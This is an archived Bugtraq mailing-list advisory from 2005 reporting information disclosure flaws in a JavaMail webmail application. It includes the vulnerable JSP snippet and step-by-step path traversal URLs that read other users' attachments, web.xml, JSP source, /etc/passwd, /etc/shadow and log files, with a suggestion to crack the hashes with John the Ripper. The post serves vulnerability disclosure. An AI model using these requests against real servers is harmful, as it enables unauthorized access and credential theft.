Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Javamail Multiple Information Disclosure Vulnerabilities

from [Ricky Latt] Network Security [Permanent Link]
Subject: Javamail Multiple Information Disclosure Vulnerabilities
Date: 25 May 2005 02:24:27 -0000 


Javamail Multiple Information Disclosure Vulnerabilities

May 25, 2005 Yangon, Myanmar.

Vulnerable Systems:
 * JavaMail API 1.3
 * JavaMail API 1.2
 * JavaMail API 1.1.3

Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows

Failed to restrict to accessing other directory and files in ReadMessage.jsp

File Name:<%=mp.getFileName()%><br>
                    Type: <%=abc.getContent_Type()%><br>
                    Size: <%=abc.getMsgSize()/1024%>Kb<br><a 
href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" 
target="_new"> download </a><br>

<%=abc.getFilePath() + "/" + abc.getFileName() %>"

It will give attacker any file on system, because it said getFilePath() + "/" + 
abc.getFileName()

1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information

1. Open specific mailbox attachment

When user download message from Javamail domain from webmail, attacker may 
notice URL 
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension

Then noticed URL lead to /var/folders so tried to switched folders.

http://example.com/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user

But got errors. So finally when reached to this URL

http://example.com/mailboxesdir/user@example.com/

It?s made listing of user@example.com attachments are there. 

Even unauthorized users are able to view specific mailbox attachment. Attacker 
need to know only username in order to get attachments listing. 

http://example.com/mailboxesdir/user2@example.com/

http://example.com/mailboxesdir/user3@example.com/


2. Download configuration information of javamail

And noticed that docdownloadfile.jsp redirect to where the file are located on 
server with the Parameter f. actually web browser got the redirect name 

http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension

This information lead to get web.xml

http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml


Which give configuration information of javamail

Download source code of jsp file
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp




3. Target machine Root/Admin Compromise

In UNIX /etc/passwd and /etc/shadow are important folder which 

A little bit curious and look in web browser typing that 
http://example.com/Download?/etc/passwd

example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh

Then Crack Unix password files with John the Ripper.

John can be found practically anywhere. For example: try going to altavista.com 
and running a search for 'john the ripper'. 

http://example.com/Download?/etc/shadow

root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::

http://example.com/Download?/etc/group
/etc/group file:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:


When attacker get information of root/admin user of target server and then 
attacker can lead to any attack. Attacker may do Website defacement, database 
altering, stealing and more.

4. Download server information

http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done?.

By 
Thet Aung Min Latt thetaung@gmail.com
http://thetaung.amyanmar.com
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Javamail Multiple Information Disclosure Vulnerabilities, Ricky Latt <=
Previous by Date:  [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail IMAP SELECT Command DoS Vulnerability, iDEFENSE Labs
Next by Date:  [Full-disclosure] Zone Labs ZoneAlarm Vet anti-virus engine OLE processing vulnerability, Zone Labs Product Security
Previous by Thread:  [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail IMAP SELECT Command DoS Vulnerability, iDEFENSE Labs
Next by Thread:  [Full-disclosure] Zone Labs ZoneAlarm Vet anti-virus engine OLE processing vulnerability, Zone Labs Product Security
Indexes:  [Date] [Thread] [Top] [All Lists]